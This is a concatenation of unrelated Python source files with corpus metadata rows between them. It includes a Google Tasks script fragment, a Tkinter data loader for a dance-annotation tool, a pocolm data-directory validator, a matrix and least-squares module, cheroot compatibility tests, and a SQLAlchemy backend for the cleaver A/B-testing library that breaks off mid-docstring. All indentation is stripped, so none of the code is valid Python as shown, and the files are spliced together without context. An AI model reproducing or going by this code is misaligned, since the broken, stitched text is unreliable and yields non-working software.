def edit_task(self, task_id, tasklist_id = '@default', title = None, notes = None, iscompleted = False, due = None):
return self._edit_task(tasklist_id,task_id,title,notes,iscompleted)
def delete_task(self, task_id, tasklist_id = '@default'):
return self._delete_task(tasklist_id,task_id)
if __name__ == '__main__':
ta = TaskAlone()
ta.restore()
print(ta.tasklists)
#tasklist = ta.tasklists['398cecc5-a699-4b4d-94da-5c856244d04c']
#task = ta.create_task(tasklist,'otra prueba')
'''
print(ta.tasklists)
tasklist = ta.tasklists['398cecc5-a699-4b4d-94da-5c856244d04c']
tasklist = ta.create_tasklist('lista de prueba')
print(tasklist)
task = ta.create_task(tasklist,'prueba')
print(task)
print(tasklist)
print(ta.tasklists)
'''
'''
tasklist = ta.create_tasklist('prueba')
print(tasklist)
task = ta.create_task(tasklist,'prueba')
print(task)
print(tasklist)
task['title'] = 'La tarea de la lista'
print(tasklist)
'''
ta.backup()
'''
gta = GTAService(token_file = comun.TOKEN_FILE)
#gc = GoogleCalendar(token_file = comun.TOKEN_FILE)
print(gta.do_refresh_authorization())
if gta.access_token is None or gta.refresh_token is None:
authorize_url = gta.get_authorize_url()
print(authorize_url)
ld = LoginDialog(authorize_url)
ld.run()
temporary_token = ld.code
ld.destroy()
print(temporary_token)
print(gta.get_authorization(temporary_token))
print(gta.get_tasklists())
#print(gta.create_tasklist('Una lista de ejemplo'))
#print(gta.get_tasks())
print'#############################################################'
print(gta.clear_completed_tasks('@default'))
print'#############################################################'
atask = (gta.create_task(tasklist_id='MDU4MDg5OTIxODI5ODgyMTE0MTg6MTA2NTc3MDc0Mzow',title='prueba'))
print'#############################################################'
print(atask)
print'#############################################################'
gta.move_task_first(atask['id'],atask['tasklist_id'])
gta.read()
atask = gta.edit_task(atask['id'],atask['tasklist_id'],title='otra prueba')
print(atask)
'''
'''
for tasklist in gta.get_tasklists():
print '########################################################'
print tasklist
for task in gta.get_tasks(tasklist_id = tasklist['id']):
print task
'''
'''
for tasklist in gta.get_tasklists():
print tasklist
#print gta.create_tasklist('desde ubuntu')
#print gta.get_tasklist('MDU4MDg5OTIxODI5ODgyMTE0MTg6MDow')
print gta.get_tasks()
for task in gta.get_tasks():
print '%s -> %s'%(task['title'],task['id'])
#print gta.create_task(title = 'prueba2 desde ubuntu',notes = 'primera prueba')
gta.move_task_first('MDU4MDg5OTIxODI5ODgyMTE0MTg6MDoy')
'''
| gpl-3.0 | -4,239,862,703,708,010,500 | 30.260504 | 182 | 0.671075 | false |
MKLab-ITI/DanceAnno | DanceAnno_Loader.py | 1 | 20273 | # This class loads the data
# 1. Skeleton (.skel or .mat)
# 2. Video (a folder with frames named XXXXXX_[index].png, .jpg or .jpeg;
#    if you have an actual video file, you can use ffmpeg to split it into frames --
#    see the example command below)
# 3. Choreography (.svl)
# 4. Music beats (.txt)
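# A typical ffmpeg command for splitting a video into frames (illustrative only --
# adjust the input file, frame rate and output pattern to your own recording):
#     ffmpeg -i recording.avi -vf fps=30 frames/rec_%06d.png
# which produces frames following the <prefix>_<index>.png naming expected below.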
import os
import sys
import DanceAnno_Application
__author__ = 'DIMITRIOS'
from tkinter import *
from tkinter import ttk # ttk is a little more beautiful than tk.
from tkinter.filedialog import askopenfilename, askdirectory
from tkinter.messagebox import showerror
from tkinter import messagebox
sys.path.append( os.path.join('.', 'Utils' ))
import readsvl # function to read svls
import readtxt # function to read txts
import readskel # function to read body skeleton trajectories
# if PyCharm underlines them with red, just ignore (alt+enter -> ignore)
class Loader:
def __init__(self):
        # This flag automatically drives the folder selection and shortens the number of clicks while debugging
self.debug_FLAG = False
self.db = 'salsa' # salsa or calus
self.debug_fastaccess = 'bertrand_c3_t1'
# Are the data loaded ?
self.skeletonLoadedFlag = False
self.videoLoadedFlag = False
self.choreoLoadedFlag = False
# GUI init
self.root = Tk()
self.root.configure(background='#000')
self.root.title("Dance Annotator")
# ask for permission to close window
self.root.protocol("WM_DELETE_WINDOW", self.close_window)
# Window initial dimensions
w = 900 # The value of the width
h = 300 # The value of the height of the window
# Your screen width and height
ws = self.root.winfo_screenwidth()
hs = self.root.winfo_screenheight()
# Top left corner of the window
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))
# Data
# Sampling rate of Kinect
self.Fs = 0
# Length of the Kinect signals
self.length_signal_samples = 0
# Number of music beats (optional)
self.nBeats = 0
# Store the index of Video frames (XXXXXXX_[index].jpg)
self.indexFrames = []
self.dname = "" # directory where video frames are located
self.prefixname = "" # the part before underscore of XXXXX_[index].jpg
self.annotationSecs = [] # First level annotation
self.labels = {}
self.annotationSecsB = [] # Second level annotation
self.labelsB = {}
self.beats = {} # Beats indicators
# Vars to indicate the parsing status of each file
self.skeletonStatusSTR = StringVar()
self.skeletonStatusSTR.set("Empty")
self.videoStatusSTR = StringVar()
self.videoStatusSTR.set("Empty")
self.choreoStatusSTR = StringVar()
self.choreoStatusSTR.set("Empty")
self.mbeatsStatusSTR = StringVar()
self.mbeatsStatusSTR.set("Empty")
# Start the GUI design
# Coloring style for ttk
style = ttk.Style()
style.configure("BW.TFrame", foreground="black", background="white")
style.configure("BW.TLabel", foreground="black", background="white")
style.configure("BW.TCheckbutton", foreground="black", background="white")
# Frame containing the loading functionalities
self.fr_filedialog = ttk.Frame(self.root, style="BW.TFrame")
# Frame containing the GUI navigation processes (Continue or Exit)
self.fr_exitcontinue = ttk.Frame(self.root, style="BW.TFrame")
# Just some text to explain what we are doing
self.lbl_explain = ttk.Label(self.fr_filedialog, text="Select the resources to annotate", style="BW.TLabel")
# --- FILE SELECTION WIDGETS ----
# 1 SKELETON
self.lbl_namelbl_mat_skeleton = ttk.Label(self.fr_filedialog, text="Skeleton Data", style="BW.TLabel")
self.entry_name_mat = Entry(self.fr_filedialog)
self.bt_mat_load = Button(self.fr_filedialog, text="...", command=self.loadSkeletonData)
self.lbl_namelbl_hint_skeleton = ttk.Label(self.fr_filedialog, text=".mat or .skel", style="BW.TLabel")
self.lbl_namelbl_status_skeleton = ttk.Label(self.fr_filedialog, textvariable=self.skeletonStatusSTR, style="BW.TLabel")
#self.separatorBtSkel = ttk.Separator(self.fr_filedialog,orient=VERTICAL)
# 2 VIDEO FRAMES
self.lbl_namelbl_frames_video = ttk.Label(self.fr_filedialog, text="Folder with frame data", style="BW.TLabel")
self.entry_name_frames = Entry(self.fr_filedialog)
self.bt_frames = Button(self.fr_filedialog, text="...", command= self.loadFramesByDirectory)
self.lbl_namelbl_hint_video = ttk.Label(self.fr_filedialog, text="A folder with jpeg, jpg, or png files", style="BW.TLabel")
self.lbl_namelbl_status_video = ttk.Label(self.fr_filedialog, textvariable=self.videoStatusSTR, style="BW.TLabel")
#self.separatorFramesVideo = ttk.Separator(self.fr_filedialog,orient=VERTICAL)
# 3 CHOREOGRAPHY
self.lbl_load_choreo = ttk.Label(self.fr_filedialog, text="Load existing choreography (Optional)", style="BW.TLabel")
self.entry_name_choreo = Entry(self.fr_filedialog)
self.bt_load_ch = Button(self.fr_filedialog, text="...", command= self.loadChoreography)
self.lbl_namelbl_hint_choreo = ttk.Label(self.fr_filedialog, text="Provide an existing .txt otherwise a new one will be created", style="BW.TLabel" )
self.lbl_namelbl_status_choreo = ttk.Label(self.fr_filedialog, textvariable=self.choreoStatusSTR, style="BW.TLabel")
# 4 Music beats
self.lbl_load_mbeats = ttk.Label(self.fr_filedialog, text="Load music beats (Optional)", style="BW.TLabel")
self.entry_name_mbeats = Entry(self.fr_filedialog)
self.bt_load_mbeats = Button(self.fr_filedialog, text="...", command= self.loadMusicBeats)
self.lbl_namelbl_hint_mbeats = ttk.Label(self.fr_filedialog, text="Music beats in .txt format", style="BW.TLabel")
self.lbl_namelbl_status_mbeats = ttk.Label(self.fr_filedialog, textvariable=self.mbeatsStatusSTR, style="BW.TLabel")
self.bt_continue = Button(self.fr_exitcontinue, text="Continue", command=self.StartAnno, state = DISABLED)
self.bt_exit = Button(self.fr_exitcontinue, text="Exit", command=self.close_window)
# --- PLACEMENT OF WIDGETs IN THE ROOT WINDOW -------
self.fr_filedialog.grid(row=0, column=0, columnspan=4, sticky=(N, S, E, W), padx=5)
self.fr_exitcontinue.grid(row=1, column=0, columnspan=4, sticky=(E), ipadx=50, padx=5)
# Explanation
self.lbl_explain.grid(row=0, column=0, columnspan=4, rowspan=1, sticky=(E,W), padx=5)
# Labels
self.lbl_namelbl_mat_skeleton.grid(column=0, sticky=(W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.entry_name_mat.grid(column=1, sticky=(N, S, E, W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.bt_mat_load.grid(column=2, sticky=(N, S, E, W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.lbl_namelbl_hint_skeleton.grid(column=3, sticky=(W), row=1, columnspan=1, rowspan=1, padx=5)
self.lbl_namelbl_status_skeleton.grid(column=4, sticky=(W), row=1, columnspan=1, rowspan=1, padx=5)
#self.separatorBtSkel.pack(side="left", fill=Y, padx=5)
self.lbl_namelbl_frames_video.grid(row=2, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_frames.grid(row=2, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.bt_frames.grid(row=2, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_video.grid(row=2, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_video.grid(row=2, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
#self.separatorFramesVideo.pack(side="left", fill=Y, padx=5)
self.lbl_load_choreo.grid(row=3, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_choreo.grid(row=3, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.bt_load_ch.grid(row=3, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_choreo.grid(row=3, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_choreo.grid(row=3, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_load_mbeats.grid(row=4, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_mbeats.grid(row=4, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.bt_load_mbeats.grid(row=4, column=2, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
self.lbl_namelbl_hint_mbeats.grid(row=4, column=3, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.lbl_namelbl_status_mbeats.grid(row=4, column=4, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.bt_exit.grid(row = 0, column = 3, sticky = (E), pady = 5, padx = 15, ipadx=25)
self.bt_continue.grid(row = 0, column = 4, sticky = (W), pady = 5, padx = 15, ipadx = 15)
ttk.Sizegrip().grid(row=6, column=3, sticky=(E))
#--------------------
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.fr_filedialog.columnconfigure(0, weight=1)
self.fr_filedialog.columnconfigure(1, weight=1)
self.fr_filedialog.columnconfigure(2, weight=1, minsize=30)
self.fr_filedialog.columnconfigure(3, weight=1)
self.fr_filedialog.columnconfigure(4, weight=1, minsize=100)
# for i in range(4):
# self.fr_filedialog.rowconfigure(i, weight=1)
self.root.resizable(True, True)
# If in debugging mode then load automatically the files
if self.debug_FLAG:
self.loadSkeletonData()
self.loadFramesByDirectory()
self.loadChoreography()
self.loadMusicBeats()
self.root.after(1000, self.StartAnno)
# Ignite GUI
self.root.mainloop()
return
# --- SKELETON DATA -------
def loadSkeletonData(self):
if self.debug_FLAG:
if self.db == 'salsa':
fname = 'Data\\Salsa\\performance-trajectories\\' + self.debug_fastaccess + '_kinect_1.mat'
elif self.db == 'calus':
fname = 'Data\\Calus\\rec.skel'
else:
if self.db == 'salsa':
fname = askopenfilename(initialdir='Data\\Salsa\\performance-trajectories',
filetypes=(("mat file", "*.mat"),("skel file", "*.skel"), ("All files", "*.*") ))
elif self.db == 'calus':
fname = askopenfilename(initialdir='Data\\Calus',
filetypes=(("skel file", "*.skel"), ("mat file", "*.mat"), ("All files", "*.*") )) #performance-trajectories
if fname:
try:
self.entry_name_mat.insert(0, "..." + fname[-30:])
dummy, fextension = os.path.splitext(fname)
# ------- load skeleton trajectories -----------------------
if fextension=='.mat':
self.signals_wrapper, self.Fs = readskel.readmatlab_wrapper(fname)
else: # .skel
self.signals_wrapper, self.Fs = readskel.skelparser(fname)
nJoints = len(self.signals_wrapper)
sigA = next(iter(self.signals_wrapper.values()))
nTrajects = len(sigA[0])
self.skeletonStatusSTR.set(str(nTrajects) + " trajects")
self.skeletonLoadedFlag = True
self.checkContinueEnable()
# global Fs, length_signal_samples
self.length_signal_samples = nTrajects
# put a separation line
separatorBtsA = ttk.Separator(self.fr_filedialog, orient=HORIZONTAL)
separatorBtsA.grid(row=5, column=0, columnspan=5, sticky="WE")
# show available joints
self.signalsSelected = {}
self.chb_joint = {}
i = 0
for key,v in sorted(self.signals_wrapper.items()):
self.signalsSelected[key] = IntVar()
if key in ('Left foot', 'Right foot'):
self.signalsSelected[key].set(1)
self.chb_joint[key] = ttk.Checkbutton(self.fr_filedialog, text = key, variable = self.signalsSelected[key], style="BW.TCheckbutton")
self.chb_joint[key].grid(row=6 + i % 10, column=1+i//10, columnspan=1, rowspan=1, sticky=(W))
i += 1
#make my screen dimensions work
w = 900 #The value of the width
h = 300 + 12*22 #The value of the height of the window
ws = self.root.winfo_screenwidth()#This value is the width of the screen
hs = self.root.winfo_screenheight()#This is the height of the screen
# calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))
#self.root.mainloop()
except Exception as e: # <- naked except is a bad idea
self.skeletonLoadedFlag = False
self.checkContinueEnable()
print(e)
showerror("Open Source File", "Failed to read file\n'%s'\n'%s'" % (fname, e))
return
return
#=========== Load directory of frames ======================================
def loadFramesByDirectory(self):
if self.debug_FLAG:
if self.db == 'salsa':
self.dname = "Data\\Salsa\\Videos\\" + self.debug_fastaccess + "_kinect_1"
elif self.db == 'calus':
self.dname = "Data\\Calus\\frames"
else:
if self.db == 'salsa':
self.dname = askdirectory(initialdir='Data\\Salsa\\Videos')
elif self.db == 'calus':
self.dname = askdirectory(initialdir='Data\\Calus')
if self.dname:
try:
self.entry_name_frames.insert(0,"..." + self.dname[-30:])
self.indexFrames = []
for file in os.listdir(self.dname):
dum, self.checkvideof_ext = os.path.splitext(file)
                    if self.checkvideof_ext in ('.jpeg', '.jpg', '.JPG', '.JPEG', '.png', '.bmp', '.PNG', '.BMP'):
dum, self.videof_ext = os.path.splitext(file)
k = file.rfind("_")
l = file.rfind(".")
iFrame = file[k+1:l]
if iFrame[0] == 'f':
iFrame = iFrame[1:]
self.indexFrames.append(int(iFrame))
self.prefixname = file[:k+2]
else:
self.indexFrames.append(int(iFrame))
self.prefixname = file[:k+1]
self.indexFrames = sorted(self.indexFrames)
self.videoStatusSTR.set( str(len(self.indexFrames)) + " Frames" )
self.videoLoadedFlag = True
elif file in ('Thumbs.db'):
continue
else:
showerror("Fail", "Only jpeg, jpg, JPG, bmp, BMP, png, PNG frames are supported")
self.videoLoadedFlag = False
return
self.checkContinueEnable()
except Exception as e: # <- naked except is a bad idea
self.videoLoadedFlag = False
self.checkContinueEnable()
showerror("Error", ("Open Source File\n'%s'" % e) + "\n" + ("Failed to open directory\n'%s'" % self.dname))
return
return
# =========== LOAD SVL CHOREOGRAPHY ===============================
def loadChoreography(self):
if self.debug_FLAG:
if self.db == 'salsa':
tempf =self.debug_fastaccess
tempf = list(tempf)
tempf[0] = tempf[0].upper()
tempf = ''.join(tempf)
fname = "Data\\Salsa\\SVL\\" + tempf + "_DanceAnnotationTool.svl"
elif self.db == 'calus':
fname = "Data\\Calus\\DanceAnnotationTool.txt"
else:
if self.db == 'salsa':
fname = askopenfilename(initialdir='Data\\Salsa\\SVL', filetypes=(("svl file", "*.svl"), ("txt file", "*.txt"), ("All files", "*.*") ))
elif self.db == 'calus':
fname = askopenfilename(initialdir='Data\\Calus', filetypes=(("txt file", "*.txt"), ("svl file", "*.svl"), ("All files", "*.*") ))
dummy, fextension = os.path.splitext(fname)
if fname:
try:
if fextension == '.svl':
params, self.annotationSecs, self.labels = readsvl.extractSvlAnnotRegionFile(fname)
self.entry_name_choreo.insert(0,"..." + fname[-30:])
self.choreoStatusSTR.set(str(len(self.labels)) + " labels")
self.choreoLoadedFlag = True
self.checkContinueEnable()
elif fextension == '.txt':
self.annotationSecs, self.labels, self.annotationSecsB, self.labelsB = readtxt.parse(fname)
self.entry_name_choreo.insert(0,"..." + fname[-30:])
self.choreoStatusSTR.set(str(len(self.labels)) + " labels")
self.choreoLoadedFlag = True
self.checkContinueEnable()
else:
showerror("Waring", "Parser does not exists for such a file, only svl or txt are supported")
except Exception as e:
self.choreoLoadedFlag = False
self.checkContinueEnable()
msg = "There was a problem in loading!\n'%s'" % e
if messagebox.askyesno("Error", msg + "\n" + "Do you want to choose another file?"):
self.loadChoreography()
else:
return
return
#=================== Music beats ========================================
def loadMusicBeats(self):
if self.debug_FLAG:
if self.db=='salsa':
fname = 'Data\\Salsa\\MusicBeats\\' + self.debug_fastaccess + '_feetcam-beats.txt'
else:
fname = None
else:
fname = askopenfilename(initialdir='Data\\Salsa\\MusicBeats',
filetypes=(("beats file", "*.txt"), ("All files", "*.*") )) #performance-trajectories
if fname:
try:
self.entry_name_mbeats.insert(0, "..." + fname[-30:])
dummy, fextension = os.path.splitext(fname)
# ------- load skeleton trajectories -----------------------
if fextension=='.txt':
self.beats = readtxt.parse_mbeats(fname)
else:
showerror("Error","Only txt file extension is supported")
return
self.nBeats = len(self.beats)
self.mbeatsStatusSTR.set(str(self.nBeats) + " Beats")
except Exception as e: # <- naked except is a bad idea
showerror("Open Source File", "Failed to read file\n'%s'\n'%s'" % (fname, e))
return
return
def close_window(self):
#if messagebox.askokcancel("Exit", "Are you sure?"):
self.root.destroy()
def StartAnno(self):
self.root.destroy()
DanceAnno_Application.Application.StartAnnotating(self)
def checkContinueEnable(self):
if self.skeletonLoadedFlag and self.videoLoadedFlag: # and self.choreoLoadedFlag:
self.bt_continue.config(state = NORMAL) | apache-2.0 | 6,038,724,737,106,642,000 | 43.656388 | 157 | 0.565432 | false |
wantee/pocolm | scripts/validate_int_dir.py | 2 | 5948 | #!/usr/bin/env python
# we're using python 3.x style print but want it to work in python 2.x, hence the __future__ import below.
from __future__ import print_function
import os
import argparse
import sys
import subprocess
parser = argparse.ArgumentParser(description="Validates directory containing integerized "
"text data, as produced by prepare_int_data.py",
epilog="E.g. validate_int_dir.py data/int.100k",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("int_dir",
help="Directory in which to find the data")
args = parser.parse_args()
os.environ['PATH'] = (os.environ['PATH'] + os.pathsep +
os.path.abspath(os.path.dirname(sys.argv[0])))
if not os.path.exists(args.int_dir):
sys.exit("validate_int_dir.py: Expected directory {0} to exist".format(args.int_dir))
if not os.path.exists("{0}/dev.txt.gz".format(args.int_dir)):
sys.exit("validate_int_dir.py: Expected file {0}/dev.txt.gz to exist".format(args.int_dir))
if not os.path.exists("{0}/num_train_sets".format(args.int_dir)):
sys.exit("validate_int_dir.py: Expected file {0}/num_train_sets to exist".format(args.int_dir))
# the following code checks the num_train_sets file and sets the num_train_sets
# variable accordingly.
f = open("{0}/num_train_sets".format(args.int_dir))
line = f.readline()
try:
num_train_sets = int(line)
assert num_train_sets > 0 and len(line.split()) == 1
assert f.readline() == ''
except Exception as e:
sys.exit("validate_int_dir.py: Expected file {0}/num_train_sets to contain "
"an integer >0: {1}".format(args.int_dir, str(e)))
f.close()
# the following code checks num_words.
f = open("{0}/num_words".format(args.int_dir))
line = f.readline()
try:
num_words = int(line)
assert num_words > 0 and len(line.split()) == 1
assert f.readline() == ''
except Exception as e:
sys.exit("validate_int_dir.py: Expected file {0}/num_words to contain "
"an integer >0: {1}".format(args.int_dir, str(e)))
f.close()
# call validate_vocab.py to check the vocab.
if os.system("validate_vocab.py --num-words={0} {1}/words.txt".format(
num_words, args.int_dir)) != 0:
sys.exit(1)
num_words = subprocess.check_output("cat {0}/words.txt | wc -l".format(args.int_dir), shell=True)
try:
num_words = int(num_words) + 1
except:
sys.exit("validate_int_dir.py: error getting number of words from {0}/words.txt".format(
args.int_dir))
names = set()
# check the 'names' file; it should have lines like:
# 1 switchboard
# 2 fisher
# etc.
f = open("{0}/names".format(args.int_dir))
for n in range(1, num_train_sets + 1):
line = f.readline()
try:
[m, name] = line.split()
if name in names:
sys.exit("validate_int_dir.py: repeated name {0} in {1}/names".format(
name, args.int_dir))
names.add(name)
assert int(m) == n
except:
sys.exit("validate_int_dir.py: bad {0}'th line of {1}/names: '{2}'".format(
n, args.int_dir, line[0:-1]))
f.close()
# validate the 'unigram_weights' file, if it exists. the 'unigram_weights' file
# is an optional part of the directory format; we put it here so it can be used
# to initialize the metaparameters in a reasonable way.
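# the expected format (the names here are just examples) is one "<name> <weight>"
# pair per line, where every training-set name from the 'names' file appears exactly
# once and each weight is a float in [0.0, 1.0], e.g.:
#   switchboard 0.5
#   fisher 0.25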
if os.path.exists("{0}/unigram_weights".format(args.int_dir)):
f = open("{0}/unigram_weights".format(args.int_dir))
names_with_weights = set()
while True:
line = f.readline()
if line == '':
break
try:
[name, weight] = line.split()
weight = float(weight)
assert weight >= 0.0 and weight <= 1.0
if name not in names:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: "
"name {2} does not appear in {1}/names".format(
line[:-1], args.int_dir, name))
if name in names_with_weights:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: "
"name {2} appears twice".format(
line[:-1], args.int_dir, name))
names_with_weights.add(name)
except Exception as e:
sys.exit("validate_int_dir.py: bad line '{0}' in file {1}/unigram_weights: {2}".format(
line[:-1], args.int_dir, str(e)))
for name in names:
if name not in names_with_weights:
sys.exit("validate_int_dir.py: expected the name {0} to appear in "
"{1}/unigram_weights".format(name, args.int_dir))
f.close()
names = ['dev']
for n in range(1, num_train_sets + 1):
names.append(str(n))
for name in names:
p = subprocess.Popen("gunzip -c {0}/{1}.txt.gz 2>/dev/null".format(args.int_dir, name),
stdout=subprocess.PIPE, shell=True)
num_ints = 0
for l in range(10):
line = p.stdout.readline()
        if not line:
break
try:
ints = [int(x) for x in line.split()]
num_ints += len(ints)
for i in ints:
if i < 3 or i > num_words:
sys.exit("validate_int_dir.py: value {0} out of range in file {1}/{2}.txt.gz".format(
i, args.int_dir, name))
except:
sys.exit("validate_int_dir.py: bad line {0} in file {1}/{2}.txt.gz".format(
line.strip('\n'), args.int_dir, name))
if num_ints == 0:
        # in theory it's possible that a file whose first 10 lines are empty
        # could be valid, as there is nothing wrong in principle with modeling
        # empty sequences.  But it's very odd.
sys.exit("validate_int_dir.py: did not see any data in file {0}/{1}.txt.gz".format(
args.int_dir, name))
p.terminate()
| apache-2.0 | -8,972,085,041,014,795,000 | 38.390728 | 105 | 0.583053 | false |
haphaeu/yoshimi | GumbleBootstrap/matrix.py | 1 | 2495 | '''
matrix.py
Basic operations with matrices:
 - multiply
 - transpose
 - invert
Matrices are stored column-wise as lists of columns, i.e. M[j][i] is the
element in row i, column j.
And a simple linear least squares solver,
performing a linear fit between two vectors
yi = a+b.xi
Revision History
rev Date Description
0.1 2013.02.13 first issue, basic insanity check
Rafael Rossi
[email protected]
[email protected]
'''
#importing deepcopy to copy list and make sure the
#original lists are not altered
from copy import deepcopy
'''
matrix A with m rows and n columns
matrix B with o rows and p columns
AB = A.B with m rows and p columns
constraint: n==o
'''
def mmult(A,B):
n=len(A)
m=len(A[0])
p=len(B)
o=len(B[0])
if not n==o: return 0
AB=[[0.0 for i in range(m)] for j in range(p)]
for i in range(m):
for j in range(p):
AB[j][i]=0.0
for k in range(n):
AB[j][i]+=A[k][i]*B[j][k]
return AB
'''
returns the transpose of a matrix
matrix A with m rows and n columns
'''
def transpose(A):
n=len(A)
m=len(A[0])
B=[[0.0 for i in range(n)] for j in range(m)]
for i in range(m):
for j in range(n):
B[i][j]=A[j][i]
return B
'''
returns the inverse of a *square* matrix
'''
def minverse(Ao):
A=deepcopy(Ao)
m = len(A)
if not m==len(A[0]): return 0
#create zero matrix
AI=[[0.0 for i in range(m)] for j in range(m)]
#fill identity matrix
for i in range(m): AI[i][i]=1.0
#invert - Gaussian elimination
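    #note: no pivoting is done, so a zero entry in the working column
    #will raise ZeroDivisionError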
for k in range(m):
for i in range(k,m):
tmp = 1.0 * A[k][i]
for j in range(k,m):
A[j][i] /= tmp
for j in range(m):
AI[j][i] /= tmp
for i in range(k+1,m):
for j in range(k,m):
A[j][i]-= A[j][k]
for j in range(m):
AI[j][i] -= AI[j][k]
for i in range(m-2, -1, -1):
for j in range(m-1, i, -1):
for k in range(m):
AI[k][i] -= A[j][i] * AI[k][j]
for k in range(m):
A[k][i] -= A[j][i]*A[k][j]
return AI
'''
perform linear least squares fit between
2 vectors xo and yo.
returns coefficients a and b such that
yoi = a+b.xoi
constraints: both xo and yo need to be a row
vector xo=[n,n,n,n] with same size.
'''
def leastsquares(xo,yo):
n=len(xo)
if not n==len(yo): return 0
y=[deepcopy(yo)]
x=[[1]*n,deepcopy(xo)]
return mmult(mmult(minverse(mmult(transpose(x),x)),transpose(x)),y)[0]
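#A minimal usage sketch (not part of the original module): recover the
#coefficients of y = 1 + 2*x from a small made-up data set.
if __name__ == '__main__':
    xs = [0.0, 1.0, 2.0, 3.0]
    ys = [1.0, 3.0, 5.0, 7.0]
    a, b = leastsquares(xs, ys)
    print('intercept a = %s, slope b = %s' % (a, b))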
| lgpl-3.0 | 1,635,034,303,182,393,000 | 22.317757 | 74 | 0.550701 | false |
cherrypy/cheroot | cheroot/test/test__compat.py | 1 | 1818 | # -*- coding: utf-8 -*-
"""Test suite for cross-python compatibility helpers."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
import six
from cheroot._compat import extract_bytes, memoryview, ntob, ntou, bton
@pytest.mark.parametrize(
('func', 'inp', 'out'),
(
(ntob, 'bar', b'bar'),
(ntou, 'bar', u'bar'),
(bton, b'bar', 'bar'),
),
)
def test_compat_functions_positive(func, inp, out):
"""Check that compatibility functions work with correct input."""
assert func(inp, encoding='utf-8') == out
@pytest.mark.parametrize(
'func',
(
ntob,
ntou,
),
)
def test_compat_functions_negative_nonnative(func):
"""Check that compatibility functions fail loudly for incorrect input."""
non_native_test_str = u'bar' if six.PY2 else b'bar'
with pytest.raises(TypeError):
func(non_native_test_str, encoding='utf-8')
def test_ntou_escape():
"""Check that ``ntou`` supports escape-encoding under Python 2."""
expected = u'hišřії'
actual = ntou('hi\u0161\u0159\u0456\u0457', encoding='escape')
assert actual == expected
@pytest.mark.parametrize(
('input_argument', 'expected_result'),
(
(b'qwerty', b'qwerty'),
(memoryview(b'asdfgh'), b'asdfgh'),
),
)
def test_extract_bytes(input_argument, expected_result):
"""Check that legitimate inputs produce bytes."""
assert extract_bytes(input_argument) == expected_result
def test_extract_bytes_invalid():
"""Ensure that invalid input causes exception to be raised."""
with pytest.raises(
ValueError,
match=r'^extract_bytes\(\) only accepts bytes '
'and memoryview/buffer$',
):
extract_bytes(u'some юнікод їїї')
| bsd-3-clause | 3,903,988,605,466,453,000 | 26.348485 | 77 | 0.632687 | false |
ryanpetrello/cleaver | cleaver/backend/db/__init__.py | 1 | 8256 | from datetime import datetime
from . import model
from .session import session_for
from cleaver.experiment import Experiment as CleaverExperiment
from cleaver.backend import CleaverBackend
def _sqlalchemy_installed():
try:
import sqlalchemy
except ImportError: # pragma: nocover
raise ImportError(
'The database backend requires SQLAlchemy to be installed. '
'See http://pypi.python.org/pypi/SQLAlchemy'
)
return sqlalchemy
_sqlalchemy_installed()
from sqlalchemy import and_ # noqa
class SQLAlchemyBackend(CleaverBackend):
"""
Provides an interface for persisting and retrieving A/B test results
to a SQLAlchemy-supported database.
"""
def __init__(self, dburi='sqlite://', engine_options={}):
self.dburi = dburi
self.engine_options = engine_options
self.Session = session_for(
dburi=self.dburi,
**self.engine_options
)
def experiment_factory(self, experiment):
if experiment is None:
return None
return CleaverExperiment(
backend=self,
name=experiment.name,
started_on=experiment.started_on,
variants=tuple(v.name for v in experiment.variants)
)
def all_experiments(self):
"""
Retrieve every available experiment.
Returns a list of ``cleaver.experiment.Experiment``s
"""
try:
return [
self.experiment_factory(e)
for e in model.Experiment.query.all()
]
finally:
self.Session.close()
def get_experiment(self, name, variants):
"""
Retrieve an experiment by its name and variants (assuming it exists).
        :param name: a unique string name for the experiment
        :param variants: a list of strings, each with a unique variant name
Returns a ``cleaver.experiment.Experiment`` or ``None``
"""
try:
return self.experiment_factory(model.Experiment.get_by(name=name))
finally:
self.Session.close()
def save_experiment(self, name, variants):
"""
Persist an experiment and its variants (unless they already exist).
        :param name: a unique string name for the experiment
        :param variants: a list of strings, each with a unique variant name
"""
try:
model.Experiment(
name=name,
started_on=datetime.utcnow(),
variants=[
model.Variant(name=v, order=i)
for i, v in enumerate(variants)
]
)
self.Session.commit()
finally:
self.Session.close()
def is_verified_human(self, identity):
try:
return model.VerifiedHuman.get_by(identity=identity) is not None
finally:
self.Session.close()
def mark_human(self, identity):
try:
if model.VerifiedHuman.get_by(identity=identity) is None:
model.VerifiedHuman(identity=identity)
self.Session.commit()
finally:
self.Session.close()
def get_variant(self, identity, experiment_name):
"""
Retrieve the variant for a specific user and experiment (if it exists).
        :param identity: a unique user identifier
        :param experiment_name: the string name of the experiment
